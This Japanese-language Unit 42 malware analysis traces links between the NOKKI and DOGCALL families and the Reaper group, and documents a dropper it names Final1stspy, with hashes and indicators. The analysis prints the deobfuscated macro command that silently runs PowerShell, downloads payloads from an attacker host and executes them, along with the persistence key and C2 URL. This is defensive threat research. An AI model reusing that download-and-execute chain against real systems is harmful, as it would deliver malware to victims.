[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# 2つのマルウェアファミリNOKKIとDOGCALLのつながり: Reaperグループ、新しいマルウェアを使用してRATを展開

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます  
Related Products  
[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Josh Grunzweig](https://unit42.paloaltonetworks.com/ja/author/josh-grunzweig/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2016年10月1日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [DogCall](https://unit42.paloaltonetworks.com/ja/tag/dogcall-ja/)
  * [NOKKI](https://unit42.paloaltonetworks.com/ja/tag/nokki-ja/)
  * [Reaper](https://unit42.paloaltonetworks.com/ja/tag/reaper-ja/)
  * [Remote Access Trojan](https://unit42.paloaltonetworks.com/ja/tag/remote-access-trojan-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/?pdf=download&lg=ja&_wpnonce=dc23a6ba65 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/?pdf=print&lg=ja&_wpnonce=dc23a6ba65 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=2つのマルウェアファミリNOKKIとDOGCALLのつながり:%20Reaperグループ、新しいマルウェアを使用してRATを展開&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat%2F&title=2つのマルウェアファミリNOKKIとDOGCALLのつながり:%20Reaperグループ、新しいマルウェアを使用してRATを展開 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat%2F&text=2つのマルウェアファミリNOKKIとDOGCALLのつながり:%20Reaperグループ、新しいマルウェアを使用してRATを展開 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=2つのマルウェアファミリNOKKIとDOGCALLのつながり:%20Reaperグループ、新しいマルウェアを使用してRATを展開%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat%2F "Share in Mastodon")

## 概要

Unit 42は最近、ロシア語およびカンボジア語を話す個人または組織を標的とする、政治的な動機付けを持つルアー(わな)を含む攻撃で使用された[NOKKI](https://unit42.paloaltonetworks.com/ja/unit42-new-konni-malware-attacking-eurasia-southeast-asia/)マルウェア ファミリを紹介しました。この調査の中で Reaperと呼ばれる脅威グループとの興味深いつながりが発見されました。

Reaperグループは、別のセキュリティ組織によって北朝鮮に属していると明らかにされていて、この国の利害に沿う組織を標的にしています。このような標的とされる組織には、韓国内の軍事/防衛産業および北朝鮮と取引があった中東の組織などが挙げられます。このグループの手口の一部には、DOGCALLと呼ばれるカスタム マルウェア ファミリの使用が含まれます。DOGCALLは、リモート アクセス型トロイの木馬(RAT)の1つで、サードパーティのホスティング サービスを使用し、データをアップロードしてコマンドを受け取ります。この特定のマルウェア ファミリは、公表時点で、[Reaper](https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html)脅威グループに使用されていることが確認されたのみです。

このブログでは、NOKKIマルウェア ファミリとDOGCALLマルウェア ファミリの間に見つかった関係を詳細に説明し、DOGCALLを展開するために使用された、未報告のマルウェア ファミリについての追加情報を提供します。弊社は、この未報告のマルウェアをPDB文字列に基づいてFinal1stspyと命名しました。

## 結び付き

Unit 42は、NOKKIマルウェアの脅威を調査中、Microsoft Word文書内で悪意のあるマクロを利用して2018年7月に始まった最新の連続攻撃を発見しました。これら特定のマクロは本質的にそれほど複雑ではなく、単に次のアクションを実行しようとしました。

* 実行可能なマルウェア ペイロードをダウンロードして実行する。
* Microsoft Wordのおとり文書をダウンロードして開く。

このマクロは、検出を回避するため、興味深い文字列の単純な難読化を採用しており、結局、base64エンコーディングのみを使用しています。ただし、まずbase64でエンコードされたテキストを16進数に変換し、その16進数をテキスト文字列に変換するという変わった手法を使用しました。  
![図1 リモート ペイロードをダウンロードして実行する悪意のあるマクロ(理解しやすいようにUnit 42がコメントを追加しています)](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/2018/120498/nokki-almost-ties-the-knot-with-dogcall-embargo/picture-01.png) 図1 リモート ペイロードをダウンロードして実行する悪意のあるマクロ(理解しやすいようにUnit 42がコメントを追加しています)  
![図2 固有の難読化解除スキームを実装した悪意のあるマクロ(マルウェア作成者がコメントを追加しています)](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/2018/120498/nokki-almost-ties-the-knot-with-dogcall-embargo/picture-02.png) 図2 固有の難読化解除スキームを実装した悪意のあるマクロ(マルウェア作成者がコメントを追加しています)

NOKKIを配信するすべてのサンプルにあるこの固有の難読化解除手法を調べた結果、別のファイルが1つ見つかりました。このファイルには次の特性がありました。

|---------|------------------------------------------------------------------|
| MD5     | e02024f38dfb6290ce0d693539a285a9                                 |
| SHA1    | d13fc918433c705b49db74c91f56ae6c0cb5cf8d                         |
| SHA256  | 66a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f025eda6b75e51 |
| 作成者     | Windows User                                                     |
| 作成日     | 2018-03-19 07:58:00 UTC                                          |
| 最終変更日   | 2018-06-16 14:19:00 UTC                                          |
| 元のファイル名 | World Cup predictions.doc                                        |

元のファイル名に基づくと、このマルウェア サンプルが2018年にロシアで開催されたワールドカップに関心を持つ個人を標的にしていたことが推測できます。下図で分かるように、両サンプル間で使用された固有の難読化解除ルーチンは、作成者が記入したコメントまで同じです。  
![図3 NOKKIドロッパーとWorld Cup predictionsドロッパーの類似点](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/2018/120498/nokki-almost-ties-the-knot-with-dogcall-embargo/picture-03.png) 図3 NOKKIドロッパーとWorld Cup predictionsドロッパーの類似点

難読化解除ルーチンは同じでしたが、マクロの実際の機能は若干異なっていました。NOKKIドロッパー サンプルは、ペイロードとおとり文書の両方をダウンロードしましたが、このWorld Cup predictionsマルウェア サンプルはHTMLでラップされたリモートVBScriptファイルをダウンロードして実行し、元のWord文書にテキストを追加して被害端末にルアーを仕掛けます。

問題のルアーには、英国の[ESPNに記載された](https://www.espn.co.uk/sports/soccer/story/_/id/23961564/world-cup-predictions-craig-burley-rafa-ramos-nicolas-baier-share-top-spot)公開記事から抽出した以下のテキストが含まれています。

> Peru and Denmark face off in the third match, and this time it doesn't seem as one sided. Four people go for a Peru victory, three for Denmark and three for the draw. Last but not least, we get to see Croatia and Nigeria for the first time. Our Nigeria expert, Colin, reckons there will be plenty of goals and a 3-2 win for his side -- the only person to back the Super Eagles. Check out how our pundits got on with their predictions for following games and remember to join the pundits' league in Match Predictor. We've got our top talent on hand from England, the United States, Mexico, Brazil, Argentina, Colombia, Australia, and Africa -- many of whom will be based out in Russia for the tournament -- to analyze each and every one of the 64 matches. We'll score our experts just as we do in the Match Predictor -- 10 points for correct result, with a bonus 20 points for getting the score line right too.

興味深いことに、2つのコメント付きルアーが、この文書にも含まれていました。1つ目のルアーには「I miss u.」というフレーズが含まれているだけですが、2つ目には、北朝鮮のリーダーのシンガポール訪問を説明している[オンラインの公開記事](https://www.thedrive.com/the-war-zone/21430/procession-of-chinese-and-north-korean-jets-have-airlifted-kim-and-company-to-singapore)から抽出したテキスト(以下参照)が含まれています。

> This aircraft seems to have conveyed a North Korean advance team including diplomats and security personnel. The 747-400, which just landed in Singapore, was apparently used to fly Kim and his personal aides to the summit. This would also be consistent with our previous reporting that North Korea had settled on such a plan. The Jumbo Jet in question is quite special. B-2447 is used by the top rungs of the Chinese government, predominantly President Xi Jinping and his entourage, when traveling abroad. It is capable of being specially outfitted with a VIP interior and has special interfaces for secure satellite communications among other modifications. With this in mind, it wasn't surprising seeing it being used as 'Kim Force One' for this special mission.

World Cup predictions.docファイルの一連の実行を完了すると、DOGCALLマルウェア サンプルが被害端末で実行されます。

このマルウェアで使用されたコメント付きルアーおよびペイロードは、DOGCALLがReaperと呼ばれる脅威グループに属しているという興味深い詳細を提供しています。また、Reaperは別のセキュリティ組織によって北朝鮮に属していることが分かっています。

## マルウェアの連続実行

World Cup predictions.docの最初の実行が行われた後、次のURLからVBScriptファイルがダウンロードされます。

`http:// kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html`

このVBScriptファイルにも、前述のまったく同じ固有の難読化解除ルーチンが

含まれています。この第2段階のVBScriptファイルを実行すると、次のデータを

%APPDATA%\\Microsoft\\mib.datに書き込み始めます。このファイルは、後でFinal1stspyマルウェア ファミリによって使用されます。このことについては後で説明します。

`1111:rom*E8FEF0CDF6C1EBBA90794B2B`

このファイルは、書き込まれた後に以下(難読化解除)を実行します。  
objShell.Run "cmd.exe /k powershell.exe" \& " " \& "-windowstyle" \& " " \& "hidden" \& " " \& "-ExecutionPolicy Bypass" \& " " \& "$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'" \& ";" \& "$f='%APPDATA%/Microsoft/ieConv.exe'" \& ";" \& "$x='" \& "http://" \& "kmbr1.nitesbr1.org" \& "/UserFiles/File/image/images/happy.jpg" \& "';" \& "$t='" \& "http://" \& "kmbr1.nitesbr1\[.\]org" \& "/UserFiles/File/image/images/wwwtest.jpg" \& "';" \& "(" \& "New-Object System.Net.WebClient" \& ")" \& ".DownloadFile($t,$f)" \& ";" \& "(" \& "New-Object System.Net.WebClient" \& ")" \& ".DownloadFile($x,$h)" \& ";" \& "Start-Process $f" \& ";" \& "Stop-Process" \& " " \& "-processname" \& " " \& "cmd", 0

|---|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | objShell.Run "cmd.exe /k powershell.exe" \& " " \& "-windowstyle" \& " " \& "hidden" \& " " \& "-ExecutionPolicy Bypass" \& " " \& "$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'" \& ";" \& "$f='%APPDATA%/Microsoft/ieConv.exe'" \& ";" \& "$x='" \& "http://" \& "kmbr1.nitesbr1.org" \& "/UserFiles/File/image/images/happy.jpg" \& "';" \& "$t='" \& "http://" \& "kmbr1.nitesbr1\[.\]org" \& "/UserFiles/File/image/images/wwwtest.jpg" \& "';" \& "(" \& "New-Object System.Net.WebClient" \& ")" \& ".DownloadFile($t,$f)" \& ";" \& "(" \& "New-Object System.Net.WebClient" \& ")" \& ".DownloadFile($x,$h)" \& ";" \& "Start-Process $f" \& ";" \& "Stop-Process" \& " " \& "-processname" \& " " \& "cmd", 0 |

この実行されたコードは、単純にhttp://kmbr1.nitesbr1\[.\]org/UserFiles/File/images/happy.jpgおよびhttp://kmbr1.nitesbr1\[.\]org/UserFiles/File/images/wwwtest.jpg から2つのファイルをダウンロードし、これらをそれぞれ%APPDATA%/Microsoft/Windows/msvcrt32.dllおよび%APPDATA%/Microsoft/ieConv.exeに保存します。最後に、新しいプロセスでVBScriptファイルが前にダウンロードしたieConv.exeファイルを実行します。

これら2つのファイルは、以前未報告だったドロッパー マルウェア ファミリの例で、弊社ではこれをFinal1stspyと呼んでいます。

## Final1stspyの概要

前述のとおり、Final1stspyマルウェア ファミリは、実行可能ファイルとDLLに分かれています。これらのファイルには次の特性があります(注意: DLLの情報は、マルウェアによって復号された後に提供されます)。

|---------------|-------------------------------------------------------------------------|
| MD5           | 0f1d3ed85fee2acc23a8a26e0dc12e0f                                        |
| SHA1          | 3d161de48d3f4da0aefff685253404c8b0111563                                |
| SHA256        | fb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6fd43c143fb3a        |
| ファイル タイプ      | PE32実行可能ファイル(GUI) Intel 80386、MS Windows対応                              |
| ファイル名         | wwwtest.jpg                                                             |
| コンパイル タイムスタンプ | 2018-06-01 15:52:41 UTC                                                 |
| PDB文字列        | E:\\Final Project(20180108)\\Final1stspy\\LoadDll\\Release\\LoadDll.pdb |

|---------------|------------------------------------------------------------------------------------------|
| MD5           | a2fe5dcb08ae8b72e8bc98ddc0b918e7                                                         |
| SHA1          | 741dbdb20d1beeb8ff809291996c8b78585cb812                                                 |
| SHA256        | 0669c71740134323793429d10518576b42941f9eee0def6057ed9a4ba87a3a9a                         |
| ファイル タイプ      | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows                                  |
| ファイル名         | happy.jpg                                                                                |
| コンパイル タイムスタンプ | 2018-06-17 17:04:15 UTC                                                                  |
| PDB文字列        | E:\\Final Project(20180108)\\Final1stspy\\hadowexecute - Copy\\Release\\hadowexecute.pdb |

ご覧のとおり、両方のサンプルは、それぞれ2週間の内にコンパイルされました。

また、このマルウェアを配信するために使用された元のMicrosoft Word文書の最終変更日は、DLLがコンパイルされた日のおよそ1日前でした。

実行可能ファイルとDLLは両方とも、特定のルーチンを利用して重要な文字列を難読化しています。Pythonで記述された次のコードがこれらの文字列をデコードします。  
import base64 data = "\[Obfuscated String\]" dataDecoded = b64decode(data) outVar = "" for char in dataDecoded: outVar += chr(((ord(char) + 122) ^ 0x19) \& 0xff) print(outVar)

|-----------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 | import base64 data = "\[Obfuscated String\]" dataDecoded = b64decode(data) outVar = "" for char in dataDecoded: outVar += chr(((ord(char) + 122) ^ 0x19) \& 0xff) print(outVar) |

Final1stspyマルウェアは、最初に以下のファイルの存在を検索します。

`%APPDATA%\Microsoft\Windows\msvcrt64.dll`

該当のファイルが存在する場合、このマルウェアはDLLをロードし、エクスポートしたmain\_func 関数を呼び出そうとします。

ファイルが存在しない場合、このマルウェアは次のファイルを探索します。

`%APPDATA%\Microsoft\Windows\msvcrt32.dll`

該当のファイルが存在する場合、このマルウェアは、このファイルの0x50に対するXOR演算処理をして復号し、その結果を前述のmsvcrt64.dllパスに書き込んで、main\_func関数をロードします。

このDLLは、実行可能ファイルで確認されたものと同じ文字列難読化ルーチンを使用します。まず、基本システム情報を収集し、次のレジストリ キーを%APPDATA%/Microsoft/ieConv.exeを指すように設定して永続性を確保します。

`HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rundll32`

Final1stspyマルウェア ファミリは引き続き前に書き込んだmib.datファイルを読み取り、解析します。データは解析され、最終的に後続のHTTP GETリクエストで使用されますが、その際Index変数、Account変数、およびGroup変数を表します。

|---------|------------------------------------|
| 元の文字列   | 1111:rom\*E8FEF0CDF6C1EBBA90794B2B |
| Index   | 1111                               |
| Account | E8FEF0CDF6C1EBBA90794B2B           |
| Group   | rom                                |

Final1stspyには、ユーザー エージェント、URL、ポート、インターバル カウントなど、いくつかの変数が格納されている%APPDATA%/Microsoft/olevnc.iniファイルを読み取る機能があります。このファイルが存在しない場合(私たちが指定した状況などにおいて)、マルウェアはデフォルトでハードコードしたユーザー エージェントおよびURLになります。この特定のサンプルはHost Process Updateのユーザー エージェントを使用してhttp://kmbr1.nitesbr1\[.\]org/UserFiles/File/image/index.php と通信します。

このマルウェアは、次の例のようにURLへのHTTP GETリクエストを実行します。  
![図4 Final1stspyマルウェア ファミリによって発行されたHTTPリクエスト](https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/2018/120498/nokki-almost-ties-the-knot-with-dogcall-embargo/picture-04.png) 図4 Final1stspyマルウェア ファミリによって発行されたHTTPリクエスト

次のGETパラメータはこのリクエストに含まれています。

|--------|----------------------------------------|
| 変数     | データ                                    |
| マシンId  | 被害端末から取得したデータから生成されたMD5                |
| InfoSo | Microsoft Windowsのバージョン情報およびCPUアーキテクチャ |
| インデックス | mib.datから取得したデータ                       |
| アカウント  | mib.datから取得したデータ                       |
| グループ   | mib.datから取得したデータ                       |
| リスト    | 実行中プロセスのリスト(base64エンコード)               |

このマルウェアは、0x49のシングルバイトXORキーを使用して後に復号されるペイロードの受信を期待しています。このペイロードは被害端末にロードされます。復号後、次のペイロードが特定されました。

|---------------|------------------------------------------------------------------|
| MD5           | 05d43d417a8f50e7b23246643fc7e03d                                 |
| SHA1          | 67c05b3937d94136eda4a60a2d5fb685abc776a1                         |
| SHA256        | 3fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967eb068ef2c8918f |
| ファイル タイプ      | PE32実行可能ファイル(GUI) Intel 80386、MS Windows対応                       |
| ファイル名         | girl.jpg                                                         |
| コンパイル タイムスタンプ | 2018-05-26 10:46:59 UTC                                          |

上記のコンパイル タイプスタンプから分かるように、このファイルはFinal1stspy実行可能ファイルと同時期にコンパイルされたようです。このペイロードはDOGCALLマルウェア ファミリに属していると特定されました。被害端末で実行できるアクションは以下のとおりです。

* スクリーンショットの取得
* キーロギング
* マイクのデータの捕捉
* 被害端末の情報の収集
* 関心のあるファイルの収集
* 追加のペイロードのダウンロードと実行

このマルウェアはサードパーティのホスティング サービスと通信して、次のサービスを含むC2チャンネルを探します。

* Dropbox
* pCloud
* Yandex Cloud
* Box

## 結論

元々、NOKKIという名前の新しいマルウェア ファミリ周辺の調査として始めた活動によって、コードの重複などKONNIとのつながりがNOKKIに見つかり、NOKKIマルウェア ファミリとReaper脅威グループとのつながりという興味深い発見に至りました。マクロ的な関係は、良く言ったところで薄いことは明らかですが、コメント付きの北朝鮮関連のルアー情報やDOGCALLマルウェア ペイロードなどさまざまな興味深い側面が明らかになりました。また、公には未報告のさらに別のマルウェア ファミリを発見し、これをFinal1stspyと命名しました。

Unit 42は、この脅威を引き続き監視し、今後新たな事実が発見された場合には報告します。パロアルトネットワークスのお客様は、この脅威から以下に示す方法で保護されています。

* 確認されたすべてのマルウェアはWildFireによって悪意あるものとして適切に区分されます。
* Trapsはこの脅威をブロックします。
* AutoFocusのお客様は、[KONNI](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Konni)、NOKKI、Final1stspy、[DOGCALL](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DogCall)、および[Reaper](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Reaper)のタグを使用して、この脅威を追跡できます。

## IOC

### World Cup predictionsのサンプル

66a0c294ee8f3507d723a376065798631906128ce79bd6dfd8f025eda6b75e51

### Final1stspyのサンプル

0669c71740134323793429d10518576b42941f9eee0def6057ed9a4ba87a3a9a

fb94a5e30de7afd1d9072ccedd90a249374f687f16170e1986d6fd43c143fb3a

### DOGCALLのサンプル

3fee068bf90ffbeb25549eb52be0456609b1decfe91cda1967eb068ef2c8918f

### インフラストラクチャ

kmbr1.nitesbr1\[.\]org
トップに戻る

### タグ

* [DogCall](https://unit42.paloaltonetworks.com/ja/tag/dogcall-ja/ "DogCall")
* [NOKKI](https://unit42.paloaltonetworks.com/ja/tag/nokki-ja/ "NOKKI")
* [Reaper](https://unit42.paloaltonetworks.com/ja/tag/reaper-ja/ "Reaper")
* [Remote Access Trojan](https://unit42.paloaltonetworks.com/ja/tag/remote-access-trojan-ja/ "Remote Access Trojan")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:LabyREnthセキュリティ コンテスト: モバイル種目の解答](https://unit42.paloaltonetworks.com/ja/unit42-labyrenth-capture-the-flag-ctf-mobile-track-solutions/ "LabyREnthセキュリティ コンテスト: モバイル種目の解答")

### 目次

* 

### 関連記事

* [BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/ "article - table of contents")
* [デジタル ドッペルゲンガーGh0st RATを配信する進化するなりすましキャンペーンの分析](https://unit42.paloaltonetworks.com/ja/impersonation-campaigns-deliver-gh0st-rat/ "article - table of contents")
* [ClickFixファクトリー：IUAM ClickFixジェネレーターの初公開](https://unit42.paloaltonetworks.com/ja/clickfix-generator-first-of-its-kind/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
